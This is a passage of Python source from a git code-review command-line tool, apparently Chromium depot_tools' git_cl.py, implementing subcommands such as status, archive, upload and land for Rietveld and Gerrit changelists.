'For Gerrit, see http://crbug.com/603116.')
# TODO(tandrii): add Gerrit support as part of http://crbug.com/603116.
parser.add_option('--activate-update', action='store_true',
help='activate auto-updating [rietveld] section in '
'.git/config')
parser.add_option('--deactivate-update', action='store_true',
help='deactivate auto-updating [rietveld] section in '
'.git/config')
options, args = parser.parse_args(args)
if options.deactivate_update:
RunGit(['config', 'rietveld.autoupdate', 'false'])
return
if options.activate_update:
RunGit(['config', '--unset', 'rietveld.autoupdate'])
return
if len(args) == 0:
GetRietveldCodereviewSettingsInteractively()
return 0
url = args[0]
if not url.endswith('codereview.settings'):
url = os.path.join(url, 'codereview.settings')
# Load code review settings and download hooks (if available).
LoadCodereviewSettingsFromFile(urllib2.urlopen(url))
return 0
def CMDbaseurl(parser, args):
"""Gets or sets base-url for this branch."""
branchref = RunGit(['symbolic-ref', 'HEAD']).strip()
branch = ShortBranchName(branchref)
_, args = parser.parse_args(args)
if not args:
print('Current base-url:')
return RunGit(['config', 'branch.%s.base-url' % branch],
error_ok=False).strip()
else:
print('Setting base-url to %s' % args[0])
return RunGit(['config', 'branch.%s.base-url' % branch, args[0]],
error_ok=False).strip()
def color_for_status(status):
"""Maps a Changelist status to color, for CMDstatus and other tools."""
return {
'unsent': Fore.RED,
'waiting': Fore.BLUE,
'reply': Fore.YELLOW,
'lgtm': Fore.GREEN,
'commit': Fore.MAGENTA,
'closed': Fore.CYAN,
'error': Fore.WHITE,
}.get(status, Fore.WHITE)
def get_cl_statuses(changes, fine_grained, max_processes=None):
"""Returns a blocking iterable of (cl, status) for given branches.
If fine_grained is true, this will fetch CL statuses from the server.
Otherwise, simply indicate if there's a matching url for the given branches.
If max_processes is specified, it is used as the maximum number of processes
to spawn to fetch CL status from the server. Otherwise 1 process per branch is
spawned.
See GetStatus() for a list of possible statuses.
"""
# Silence upload.py; otherwise it becomes unwieldy.
upload.verbosity = 0
if fine_grained:
# Process one branch synchronously to work through authentication, then
# spawn processes to process all the other branches in parallel.
if changes:
fetch = lambda cl: (cl, cl.GetStatus())
yield fetch(changes[0])
if not changes:
# Exit early if there was only one branch to fetch.
return
changes_to_fetch = changes[1:]
pool = ThreadPool(
min(max_processes, len(changes_to_fetch))
if max_processes is not None
else len(changes_to_fetch))
fetched_cls = set()
it = pool.imap_unordered(fetch, changes_to_fetch).__iter__()
while True:
try:
row = it.next(timeout=5)
except multiprocessing.TimeoutError:
break
fetched_cls.add(row[0])
yield row
# Add any branches that failed to fetch.
for cl in set(changes_to_fetch) - fetched_cls:
yield (cl, 'error')
else:
# Do not use GetApprovingReviewers(), since it requires an HTTP request.
for cl in changes:
yield (cl, 'waiting' if cl.GetIssueURL() else 'error')
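# Typical (illustrative) use of the generator above:
#   for cl, status in get_cl_statuses(changes, fine_grained=True):
#     print('%s: %s' % (cl.GetBranch(), status))
# Callers such as CMDstatus iterate it as results arrive, so slow branches do
# not block the ones already fetched.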
def upload_branch_deps(cl, args):
"""Uploads CLs of local branches that are dependents of the current branch.
If the local branch dependency tree looks like:
test1 -> test2.1 -> test3.1
-> test3.2
-> test2.2 -> test3.3
and you run "git cl upload --dependencies" from test1 then "git cl upload" is
run on the dependent branches in this order:
test2.1, test3.1, test3.2, test2.2, test3.3
Note: This function does not rebase your local dependent branches. Use it when
you make a change to the parent branch that will not conflict with its
dependent branches, and you would like their dependencies updated in
Rietveld.
"""
if git_common.is_dirty_git_tree('upload-branch-deps'):
return 1
root_branch = cl.GetBranch()
if root_branch is None:
DieWithError('Can\'t find dependent branches from detached HEAD state. '
'Get on a branch!')
if not cl.GetIssue() or not cl.GetPatchset():
DieWithError('Current branch does not have an uploaded CL. We cannot set '
'patchset dependencies without an uploaded CL.')
branches = RunGit(['for-each-ref',
'--format=%(refname:short) %(upstream:short)',
'refs/heads'])
if not branches:
print('No local branches found.')
return 0
# Create a dictionary of all local branches to the branches that are dependent
# on it.
tracked_to_dependents = collections.defaultdict(list)
for b in branches.splitlines():
tokens = b.split()
if len(tokens) == 2:
branch_name, tracked = tokens
tracked_to_dependents[tracked].append(branch_name)
print()
print('The dependent local branches of %s are:' % root_branch)
dependents = []
def traverse_dependents_preorder(branch, padding=''):
dependents_to_process = tracked_to_dependents.get(branch, [])
padding += ' '
for dependent in dependents_to_process:
print('%s%s' % (padding, dependent))
dependents.append(dependent)
traverse_dependents_preorder(dependent, padding)
traverse_dependents_preorder(root_branch)
print()
if not dependents:
print('There are no dependent local branches for %s' % root_branch)
return 0
print('This command will checkout all dependent branches and run '
'"git cl upload".')
ask_for_data('[Press enter to continue or ctrl-C to quit]')
# Add a default patchset title to all upload calls in Rietveld.
if not cl.IsGerrit():
args.extend(['-t', 'Updated patchset dependency'])
# Record all dependents that failed to upload.
failures = {}
# Go through all dependents, checkout the branch and upload.
try:
for dependent_branch in dependents:
print()
print('--------------------------------------')
print('Running "git cl upload" from %s:' % dependent_branch)
RunGit(['checkout', '-q', dependent_branch])
print()
try:
if CMDupload(OptionParser(), args) != 0:
print('Upload failed for %s!' % dependent_branch)
failures[dependent_branch] = 1
except: # pylint: disable=W0702
failures[dependent_branch] = 1
print()
finally:
# Swap back to the original root branch.
RunGit(['checkout', '-q', root_branch])
print()
print('Upload complete for dependent branches!')
for dependent_branch in dependents:
upload_status = 'failed' if failures.get(dependent_branch) else 'succeeded'
print(' %s : %s' % (dependent_branch, upload_status))
print()
return 0
def CMDarchive(parser, args):
"""Archives and deletes branches associated with closed changelists."""
parser.add_option(
'-j', '--maxjobs', action='store', type=int,
help='The maximum number of jobs to use when retrieving review status')
parser.add_option(
'-f', '--force', action='store_true',
help='Bypasses the confirmation prompt.')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % ' '.join(args))
auth_config = auth.extract_auth_config_from_options(options)
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
return 0
print('Finding all branches associated with closed issues...')
changes = [Changelist(branchref=b, auth_config=auth_config)
for b in branches.splitlines()]
alignment = max(5, max(len(c.GetBranch()) for c in changes))
statuses = get_cl_statuses(changes,
fine_grained=True,
max_processes=options.maxjobs)
proposal = [(cl.GetBranch(),
'git-cl-archived-%s-%s' % (cl.GetIssue(), cl.GetBranch()))
for cl, status in statuses
if status == 'closed']
proposal.sort()
if not proposal:
print('No branches with closed codereview issues found.')
return 0
current_branch = GetCurrentBranch()
print('\nBranches with closed issues that will be archived:\n')
print('%*s | %s' % (alignment, 'Branch name', 'Archival tag name'))
for next_item in proposal:
print('%*s %s' % (alignment, next_item[0], next_item[1]))
if any(branch == current_branch for branch, _ in proposal):
print('You are currently on a branch \'%s\' which is associated with a '
'closed codereview issue, so archive cannot proceed. Please '
'checkout another branch and run this command again.' %
current_branch)
return 1
if not options.force:
answer = ask_for_data('\nProceed with deletion (Y/n)? ').lower()
if answer not in ('y', ''):
print('Aborted.')
return 1
for branch, tagname in proposal:
RunGit(['tag', tagname, branch])
RunGit(['branch', '-D', branch])
print('\nJob\'s done!')
return 0
def CMDstatus(parser, args):
"""Show status of changelists.
Colors are used to tell the state of the CL unless --fast is used:
- Red not sent for review or broken
- Blue waiting for review
- Yellow waiting for you to reply to review
- Green LGTM'ed
- Magenta in the commit queue
- Cyan was committed, branch can be deleted
Also see 'git cl comments'.
"""
parser.add_option('--field',
help='print only specific field (desc|id|patch|url)')
parser.add_option('-f', '--fast', action='store_true',
help='Do not retrieve review status')
parser.add_option(
'-j', '--maxjobs', action='store', type=int,
help='The maximum number of jobs to use when retrieving review status')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % args)
auth_config = auth.extract_auth_config_from_options(options)
if options.field:
cl = Changelist(auth_config=auth_config)
if options.field.startswith('desc'):
print(cl.GetDescription())
elif options.field == 'id':
issueid = cl.GetIssue()
if issueid:
print(issueid)
elif options.field == 'patch':
patchset = cl.GetPatchset()
if patchset:
print(patchset)
elif options.field == 'url':
url = cl.GetIssueURL()
if url:
print(url)
return 0
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
print('No local branch found.')
return 0
changes = [
Changelist(branchref=b, auth_config=auth_config)
for b in branches.splitlines()]
print('Branches associated with reviews:')
output = get_cl_statuses(changes,
fine_grained=not options.fast,
max_processes=options.maxjobs)
branch_statuses = {}
alignment = max(5, max(len(ShortBranchName(c.GetBranch())) for c in changes))
for cl in sorted(changes, key=lambda c: c.GetBranch()):
branch = cl.GetBranch()
while branch not in branch_statuses:
c, status = output.next()
branch_statuses[c.GetBranch()] = status
status = branch_statuses.pop(branch)
url = cl.GetIssueURL()
if url and (not status or status == 'error'):
# The issue probably doesn't exist anymore.
url += ' (broken)'
color = color_for_status(status)
reset = Fore.RESET
if not setup_color.IS_TTY:
color = ''
reset = ''
status_str = '(%s)' % status if status else ''
print(' %*s : %s%s %s%s' % (
alignment, ShortBranchName(branch), color, url,
status_str, reset))
cl = Changelist(auth_config=auth_config)
print()
print('Current branch:',)
print(cl.GetBranch())
if not cl.GetIssue():
print('No issue assigned.')
return 0
print('Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL()))
if not options.fast:
print('Issue description:')
print(cl.GetDescription(pretty=True))
return 0
def colorize_CMDstatus_doc():
"""To be called once in main() to add colors to git cl status help."""
colors = [i for i in dir(Fore) if i[0].isupper()]
def colorize_line(line):
for color in colors:
if color in line.upper():
# Extract whitespaces first and the leading '-'.
indent = len(line) - len(line.lstrip(' ')) + 1
return line[:indent] + getattr(Fore, color) + line[indent:] + Fore.RESET
return line
lines = CMDstatus.__doc__.splitlines()
CMDstatus.__doc__ = '\n'.join(colorize_line(l) for l in lines)
@subcommand.usage('[issue_number]')
def CMDissue(parser, args):
"""Sets or displays the current code review issue number.
Pass issue number 0 to clear the current issue.
"""
parser.add_option('-r', '--reverse', action='store_true',
help='Lookup the branch(es) for the specified issues. If '
'no issues are specified, all branches with mapped '
'issues will be listed.')
_add_codereview_select_options(parser)
options, args = parser.parse_args(args)
_process_codereview_select_options(parser, options)
if options.reverse:
branches = RunGit(['for-each-ref', 'refs/heads',
'--format=%(refname:short)']).splitlines()
# Reverse issue lookup.
issue_branch_map = {}
for branch in branches:
cl = Changelist(branchref=branch)
issue_branch_map.setdefault(cl.GetIssue(), []).append(branch)
if not args:
args = sorted(issue_branch_map.iterkeys())
for issue in args:
if not issue:
continue
print('Branch for issue number %s: %s' % (
issue, ', '.join(issue_branch_map.get(int(issue)) or ('None',))))
else:
cl = Changelist(codereview=options.forced_codereview)
if len(args) > 0:
try:
issue = int(args[0])
except ValueError:
DieWithError('Pass a number to set the issue or none to list it.\n'
'Maybe you want to run git cl status?')
cl.SetIssue(issue)
print('Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL()))
return 0
def CMDcomments(parser, args):
"""Shows or posts review comments for any changelist."""
parser.add_option('-a', '--add-comment', dest='comment',
help='comment to add to an issue')
parser.add_option('-i', dest='issue',
help="review issue id (defaults to current issue)")
parser.add_option('-j', '--json-file',
help='File to write JSON summary to')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
issue = None
if options.issue:
try:
issue = int(options.issue)
except ValueError:
DieWithError('A review issue id is expected to be a number')
cl = Changelist(issue=issue, codereview='rietveld', auth_config=auth_config)
if options.comment:
cl.AddComment(options.comment)
return 0
data = cl.GetIssueProperties()
summary = []
for message in sorted(data.get('messages', []), key=lambda x: x['date']):
summary.append({
'date': message['date'],
'lgtm': False,
'message': message['text'],
'not_lgtm': False,
'sender': message['sender'],
})
if message['disapproval']:
color = Fore.RED
summary[-1]['not_lgtm'] = True
elif message['approval']:
color = Fore.GREEN
summary[-1]['lgtm'] = True
elif message['sender'] == data['owner_email']:
color = Fore.MAGENTA
else:
color = Fore.BLUE
print('\n%s%s %s%s' % (
color, message['date'].split('.', 1)[0], message['sender'],
Fore.RESET))
if message['text'].strip():
print('\n'.join(' ' + l for l in message['text'].splitlines()))
if options.json_file:
with open(options.json_file, 'wb') as f:
json.dump(summary, f)
return 0
@subcommand.usage('[codereview url or issue id]')
def CMDdescription(parser, args):
"""Brings up the editor for the current CL's description."""
parser.add_option('-d', '--display', action='store_true',
help='Display the description instead of opening an editor')
parser.add_option('-n', '--new-description',
help='New description to set for this issue (- for stdin)')
_add_codereview_select_options(parser)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
_process_codereview_select_options(parser, options)
target_issue = None
if len(args) > 0:
issue_arg = ParseIssueNumberArgument(args[0])
if not issue_arg.valid:
parser.print_help()
return 1
target_issue = issue_arg.issue
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(
auth_config=auth_config, issue=target_issue,
codereview=options.forced_codereview)
if not cl.GetIssue():
DieWithError('This branch has no associated changelist.')
description = ChangeDescription(cl.GetDescription())
if options.display:
print(description.description)
return 0
if options.new_description:
text = options.new_description
if text == '-':
text = '\n'.join(l.rstrip() for l in sys.stdin)
description.set_description(text)
else:
description.prompt()
if cl.GetDescription() != description.description:
cl.UpdateDescription(description.description)
return 0
def CreateDescriptionFromLog(args):
"""Pulls out the commit log to use as a base for the CL description."""
log_args = []
if len(args) == 1 and not args[0].endswith('.'):
log_args = [args[0] + '..']
elif len(args) == 1 and args[0].endswith('...'):
log_args = [args[0][:-1]]
elif len(args) == 2:
log_args = [args[0] + '..' + args[1]]
else:
log_args = args[:] # Hope for the best!
return RunGit(['log', '--pretty=format:%s\n\n%b'] + log_args)
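# Illustrative argument handling (hypothetical refs): args == ['origin/master']
# runs `git log origin/master..`, args == ['origin/master...'] runs
# `git log origin/master..`, and args == ['HEAD~3', 'HEAD'] runs
# `git log HEAD~3..HEAD`; anything else is passed through unchanged.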
def CMDlint(parser, args):
"""Runs cpplint on the current changelist."""
parser.add_option('--filter', action='append', metavar='-x,+y',
help='Comma-separated list of cpplint\'s category-filters')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
# Access to a protected member _XX of a client class
# pylint: disable=W0212
try:
import cpplint
import cpplint_chromium
except ImportError:
print('Your depot_tools is missing cpplint.py and/or cpplint_chromium.py.')
return 1
# Change the current working directory before calling lint so that it
# shows the correct base.
previous_cwd = os.getcwd()
os.chdir(settings.GetRoot())
try:
cl = Changelist(auth_config=auth_config)
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
files = [f.LocalPath() for f in change.AffectedFiles()]
if not files:
print('Cannot lint an empty CL')
return 1
# Process cpplint's arguments, if any.
command = args + files
if options.filter:
command = ['--filter=' + ','.join(options.filter)] + command
filenames = cpplint.ParseArguments(command)
white_regex = re.compile(settings.GetLintRegex())
black_regex = re.compile(settings.GetLintIgnoreRegex())
extra_check_functions = [cpplint_chromium.CheckPointerDeclarationWhitespace]
for filename in filenames:
if white_regex.match(filename):
if black_regex.match(filename):
print('Ignoring file %s' % filename)
else:
cpplint.ProcessFile(filename, cpplint._cpplint_state.verbose_level,
extra_check_functions)
else:
print('Skipping file %s' % filename)
finally:
os.chdir(previous_cwd)
print('Total errors found: %d\n' % cpplint._cpplint_state.error_count)
if cpplint._cpplint_state.error_count != 0:
return 1
return 0
def CMDpresubmit(parser, args):
"""Runs presubmit tests on the current changelist."""
parser.add_option('-u', '--upload', action='store_true',
help='Run upload hook instead of the push/dcommit hook')
parser.add_option('-f', '--force', action='store_true',
help='Run checks even if tree is dirty')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if not options.force and git_common.is_dirty_git_tree('presubmit'):
print('use --force to check even if tree is dirty.')
return 1
cl = Changelist(auth_config=auth_config)
if args:
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
cl.RunHook(
committing=not options.upload,
may_prompt=False,
verbose=options.verbose,
change=cl.GetChange(base_branch, None))
return 0
def GenerateGerritChangeId(message):
"""Returns Ixxxxxx...xxx change id.
Works the same way as
https://gerrit-review.googlesource.com/tools/hooks/commit-msg
but can be called on demand on all platforms.
The basic idea is to generate git hash of a state of the tree, original commit
message, author/committer info and timestamps.
"""
lines = []
tree_hash = RunGitSilent(['write-tree'])
lines.append('tree %s' % tree_hash.strip())
code, parent = RunGitWithCode(['rev-parse', 'HEAD~0'], suppress_stderr=False)
if code == 0:
lines.append('parent %s' % parent.strip())
author = RunGitSilent(['var', 'GIT_AUTHOR_IDENT'])
lines.append('author %s' % author.strip())
committer = RunGitSilent(['var', 'GIT_COMMITTER_IDENT'])
lines.append('committer %s' % committer.strip())
lines.append('')
# Note: Gerrit's commit-hook actually cleans message of some lines and
# whitespace. This code is not doing this, but it clearly won't decrease
# entropy.
lines.append(message)
change_hash = RunCommand(['git', 'hash-object', '-t', 'commit', '--stdin'],
stdin='\n'.join(lines))
return 'I%s' % change_hash.strip()
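# Rough equivalence (illustrative only, not used by this file): the id is
# "I" + `git hash-object -t commit --stdin` over the synthetic
# tree/parent/author/committer/message blob built above; since the author and
# committer idents embed the current timestamp, repeated invocations yield
# different ids even for an identical message.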
def GetTargetRef(remote, remote_branch, target_branch, pending_prefix):
"""Computes the remote branch ref to use for the CL.
Args:
remote (str): The git remote for the CL.
remote_branch (str): The git remote branch for the CL.
target_branch (str): The target branch specified by the user.
pending_prefix (str): The pending prefix from the settings.
"""
if not (remote and remote_branch):
return None
if target_branch:
# Canonicalize branch references to the equivalent local full symbolic
# refs, which are then translated into the remote full symbolic refs
# below.
if '/' not in target_branch:
remote_branch = 'refs/remotes/%s/%s' % (remote, target_branch)
else:
prefix_replacements = (
('^((refs/)?remotes/)?branch-heads/', 'refs/remotes/branch-heads/'),
('^((refs/)?remotes/)?%s/' % remote, 'refs/remotes/%s/' % remote),
('^(refs/)?heads/', 'refs/remotes/%s/' % remote),
)
match = None
for regex, replacement in prefix_replacements:
match = re.search(regex, target_branch)
if match:
remote_branch = target_branch.replace(match.group(0), replacement)
break
if not match:
# This is a branch path but not one we recognize; use as-is.
remote_branch = target_branch
elif remote_branch in REFS_THAT_ALIAS_TO_OTHER_REFS:
# Handle the refs that need to land in different refs.
remote_branch = REFS_THAT_ALIAS_TO_OTHER_REFS[remote_branch]
# Create the true path to the remote branch.
# Does the following translation:
# * refs/remotes/origin/refs/diff/test -> refs/diff/test
# * refs/remotes/origin/master -> refs/heads/master
# * refs/remotes/branch-heads/test -> refs/branch-heads/test
if remote_branch.startswith('refs/remotes/%s/refs/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote, '')
elif remote_branch.startswith('refs/remotes/%s/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote,
'refs/heads/')
elif remote_branch.startswith('refs/remotes/branch-heads'):
remote_branch = remote_branch.replace('refs/remotes/', 'refs/')
# If a pending prefix exists then replace refs/ with it.
if pending_prefix:
remote_branch = remote_branch.replace('refs/', pending_prefix)
return remote_branch
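# Illustrative translations (hypothetical branch names):
#   GetTargetRef('origin', 'refs/remotes/origin/master', None, None)
#       -> 'refs/heads/master'
#   GetTargetRef('origin', 'refs/remotes/origin/master', 'branch-heads/1234', None)
#       -> 'refs/branch-heads/1234'
# A non-empty pending_prefix then replaces 'refs/' in the result.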
def cleanup_list(l):
"""Fixes a list so that comma separated items are put as individual items.
So that "--reviewers joe@c,john@c --reviewers joa@c" results in
options.reviewers == sorted(['joe@c', 'john@c', 'joa@c']).
"""
items = sum((i.split(',') for i in l), [])
stripped_items = (i.strip() for i in items)
return sorted(filter(None, stripped_items))
@subcommand.usage('[args to "git diff"]')
def CMDupload(parser, args):
"""Uploads the current changelist to codereview.
Can skip dependency patchset uploads for a branch by running:
git config branch.branch_name.skip-deps-uploads True
To unset run:
git config --unset branch.branch_name.skip-deps-uploads
Can also set the above globally by using the --global flag.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('--bypass-watchlists', action='store_true',
dest='bypass_watchlists',
help='bypass watchlists auto CC-ing reviewers')
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-m', dest='message', help='message for patchset')
parser.add_option('--message-file', dest='message_file',
help='file which contains message for patchset')
parser.add_option('-t', dest='title',
help='title for patchset (Rietveld only)')
parser.add_option('-r', '--reviewers',
action='append', default=[],
help='reviewer email addresses')
parser.add_option('--cc',
action='append', default=[],
help='cc email addresses')
parser.add_option('-s', '--send-mail', action='store_true',
help='send email to reviewer immediately')
parser.add_option('--emulate_svn_auto_props',
'--emulate-svn-auto-props',
action="store_true",
dest="emulate_svn_auto_props",
help="Emulate Subversion's auto properties feature.")
parser.add_option('-c', '--use-commit-queue', action='store_true',
help='tell the commit queue to commit this patchset')
parser.add_option('--private', action='store_true',
help='set the review private (rietveld only)')
parser.add_option('--target_branch',
'--target-branch',
metavar='TARGET',
help='Apply CL to remote ref TARGET. ' +
'Default: remote branch head, or master')
parser.add_option('--squash', action='store_true',
help='Squash multiple commits into one (Gerrit only)')
parser.add_option('--no-squash', action='store_true',
help='Don\'t squash multiple commits into one ' +
'(Gerrit only)')
parser.add_option('--email', default=None,
help='email address to use to connect to Rietveld')
parser.add_option('--tbr-owners', dest='tbr_owners', action='store_true',
help='add a set of OWNERS to TBR')
parser.add_option('-d', '--cq-dry-run', dest='cq_dry_run',
action='store_true',
help='Send the patchset to do a CQ dry run right after '
'upload.')
parser.add_option('--dependencies', action='store_true',
help='Uploads CLs of all the local branches that depend on '
'the current branch')
orig_args = args
add_git_similarity(parser)
auth.add_auth_options(parser)
_add_codereview_select_options(parser)
(options, args) = parser.parse_args(args)
_process_codereview_select_options(parser, options)
auth_config = auth.extract_auth_config_from_options(options)
if git_common.is_dirty_git_tree('upload'):
return 1
options.reviewers = cleanup_list(options.reviewers)
options.cc = cleanup_list(options.cc)
if options.message_file:
if options.message:
parser.error('only one of --message and --message-file allowed.')
options.message = gclient_utils.FileRead(options.message_file)
options.message_file = None
# For sanity of test expectations, force this otherwise lazy lookup *now*.
settings.GetIsGerrit()
cl = Changelist(auth_config=auth_config, codereview=options.forced_codereview)
return cl.CMDUpload(options, args, orig_args)
def IsSubmoduleMergeCommit(ref):
# When submodules are added to the repo, we expect there to be a single
# non-git-svn merge commit at remote HEAD with a signature comment.
pattern = '^SVN changes up to revision [0-9]*$'
cmd = ['rev-list', '--merges', '--grep=%s' % pattern, '%s^!' % ref]
return RunGit(cmd) != ''
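# Illustrative: when submodules were introduced by a merge commit whose message
# is e.g. "SVN changes up to revision 123456", the rev-list call above prints
# that commit for the given ref and this returns True; otherwise the output is
# empty and it returns False.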
def SendUpstream(parser, args, cmd):
"""Common code for CMDland and CmdDCommit
In case of Gerrit, uses Gerrit REST api to "submit" the issue, which pushes
upstream and closes the issue automatically and atomically.
Otherwise (in case of Rietveld):
Squashes branch into a single commit.
Updates changelog with metadata (e.g. pointer to review).
Pushes/dcommits the code upstream.
Updates review and closes.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('-m', dest='message',
help="override review description")
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-c', dest='contributor',
help="external contributor for patch (appended to " +
"description and used as author for git). Should be " +
"formatted as 'First Last <[email protected]>'")
add_git_similarity(parser)
auth.add_auth_options(parser)
(options, args) = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(auth_config=auth_config)
# TODO(tandrii): refactor this into _RietveldChangelistImpl method.
if cl.IsGerrit():
if options.message:
# This could be implemented, but it requires sending a new patch to
# Gerrit, as Gerrit unlike Rietveld versions messages with patchsets.
# Besides, Gerrit has the ability to change the commit message on submit
# automatically, thus there is no need to support this option (so far?).
parser.error('-m MESSAGE option is not supported for Gerrit.')
if options.contributor:
parser.error(
'-c CONTRIBUTOR option is not supported for Gerrit.\n'
'Before uploading a commit to Gerrit, ensure its author field is '
'the contributor\'s "name <email>". If you can\'t upload such a '
'commit for review, contact your repository admin and request '
'"Forge-Author" permission.')
return cl._codereview_impl.CMDLand(options.force, options.bypass_hooks,
options.verbose)
current = cl.GetBranch()
remote, upstream_branch = cl.FetchUpstreamTuple(cl.GetBranch())
if not settings.GetIsGitSvn() and remote == '.':
print()
print('Attempting to push branch %r into another local branch!' % current)
print()
print('Either reparent this branch on top of origin/master:')
print(' git reparent-branch --root')
print()
print('OR run `git rebase-update` if you think the parent branch is ')
print('already committed.')
print()
print(' Current parent: %r' % upstream_branch)
return 1
if not args or cmd == 'land':
# Default to merging against our best guess of the upstream branch.
args = [cl.GetUpstreamBranch()]
if options.contributor:
if not re.match(r'^.*\s<\S+@\S+>$', options.contributor):
print("Please provide contributor as 'First Last <[email protected]>'")
return 1
base_branch = args[0]
base_has_submodules = IsSubmoduleMergeCommit(base_branch)
if git_common.is_dirty_git_tree(cmd):
return 1
# This rev-list syntax means "show all commits not in my branch that
# are in base_branch".
upstream_commits = RunGit(['rev-list', '^' + cl.GetBranchRef(),
base_branch]).splitlines()
if upstream_commits:
print('Base branch "%s" has %d commits '
'not in this branch.' % (base_branch, len(upstream_commits)))
print('Run "git merge %s" before attempting to %s.' % (base_branch, cmd))
return 1
# This is the revision `svn dcommit` will commit on top of.
svn_head = None
if cmd == 'dcommit' or base_has_submodules:
svn_head = RunGit(['log', '--grep=^git-svn-id:', '-1',
'--pretty=format:%H'])
if cmd == 'dcommit':
# If the base_head is a submodule merge commit, the first parent of the
# base_head should be a git-svn commit, which is what we're interested in.
base_svn_head = base_branch
if base_has_submodules:
base_svn_head += '^1'
extra_commits = RunGit(['rev-list', '^' + svn_head, base_svn_head])
if extra_commits:
print('This branch has %d additional commits not upstreamed yet.'
% len(extra_commits.splitlines()))
print('Upstream "%s" or rebase this branch on top of the upstream trunk '
'before attempting to %s.' % (base_branch, cmd))
return 1
merge_base = RunGit(['merge-base', base_branch, 'HEAD']).strip()
if not options.bypass_hooks:
author = None
if options.contributor:
author = re.search(r'\<(.*)\>', options.contributor).group(1)
hook_results = cl.RunHook(
committing=True,
may_prompt=not options.force,
verbose=options.verbose,
change=cl.GetChange(merge_base, author))
if not hook_results.should_continue():
return 1
# Check the tree status if the tree status URL is set.
status = GetTreeStatus()
if 'closed' == status:
print('The tree is closed. Please wait for it to reopen. Use '
'"git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
elif 'unknown' == status:
print('Unable to determine tree status. Please verify manually and '
'use "git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
change_desc = ChangeDescription(options.message)
if not change_desc.description and cl.GetIssue():
change_desc = ChangeDescription(cl.GetDescription())
if not change_desc.description:
if not cl.GetIssue() and options.bypass_hooks:
change_desc = ChangeDescription(CreateDescriptionFromLog([merge_base]))
else:
print('No description set.')
print('Visit %s/edit to set it.' % (cl.GetIssueURL()))
return 1
# Keep a separate copy for the commit message, because the commit message
# contains the link to the Rietveld issue, while the Rietveld message contains
# the commit viewvc url.
if cl.GetIssue():
change_desc.update_reviewers(cl.GetApprovingReviewers())
commit_desc = ChangeDescription(change_desc.description)
if cl.GetIssue():
# Xcode won't linkify this URL unless there is a non-whitespace character
# after it. Add a period on a new line to circumvent this. Also add a space
# before the period to make sure that Gitiles continues to correctly resolve
# the URL.
commit_desc.append_footer('Review URL: %s .' % cl.GetIssueURL())
if options.contributor:
commit_desc.append_footer('Patch from %s.' % options.contributor)
print('Description:')
print(commit_desc.description)
branches = [merge_base, cl.GetBranchRef()]
if not options.force:
print_stats(options.similarity, options.find_copies, branches)
# We want to squash all this branch's commits into one commit with the proper
# description. We do this by doing a "reset --soft" to the base branch (which
# keeps the working copy the same), then dcommitting that. If origin/master
# has a submodule merge commit, we'll also need to cherry-pick the squashed
# commit onto a branch based on the git-svn head.
MERGE_BRANCH = 'git-cl-commit'
CHERRY_PICK_BRANCH = 'git-cl-cherry-pick'
# Delete the branches if they exist.
for branch in [MERGE_BRANCH, CHERRY_PICK_BRANCH]:
showref_cmd = ['show-ref', '--quiet', '--verify', 'refs/heads/%s' % branch]
result = RunGitWithCode(showref_cmd)
if result[0] == 0:
RunGit(['branch', '-D', branch])
# We might be in a directory that's present in this branch but not in the
# trunk. Move up to the top of the tree so that git commands that expect a
# valid CWD won't fail after we check out the merge branch.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Stuff our change into the merge branch.
# We wrap in a try...finally block so if anything goes wrong,
# we clean up the branches.
retcode = -1
pushed_to_pending = False
pending_ref = None
revision = None
try:
RunGit(['checkout', '-q', '-b', MERGE_BRANCH])
RunGit(['reset', '--soft', merge_base])
if options.contributor:
RunGit(
[
'commit', '--author', options.contributor,
'-m', commit_desc.description,
])
else:
RunGit(['commit', '-m', commit_desc.description])
if base_has_submodules:
cherry_pick_commit = RunGit(['rev-list', 'HEAD^!']).rstrip()
RunGit(['branch', CHERRY_PICK_BRANCH, svn_head])
RunGit(['checkout', CHERRY_PICK_BRANCH])
RunGit(['cherry-pick', cherry_pick_commit])
if cmd == 'land':
remote, branch = cl.FetchUpstreamTuple(cl.GetBranch())
mirror = settings.GetGitMirror(remote)
pushurl = mirror.url if mirror else remote
pending_prefix = settings.GetPendingRefPrefix()
if not pending_prefix or branch.startswith(pending_prefix):
# If not using refs/pending/heads/* at all, or target ref is already set
# to pending, then push to the target ref directly.
retcode, output = RunGitWithCode(
['push', '--porcelain', pushurl, 'HEAD:%s' % branch])
pushed_to_pending = pending_prefix and branch.startswith(pending_prefix)
else:
# Cherry-pick the change on top of pending ref and then push it.
assert branch.startswith('refs/'), branch
assert pending_prefix[-1] == '/', pending_prefix
pending_ref = pending_prefix + branch[len('refs/'):]
retcode, output = PushToGitPending(pushurl, pending_ref, branch)
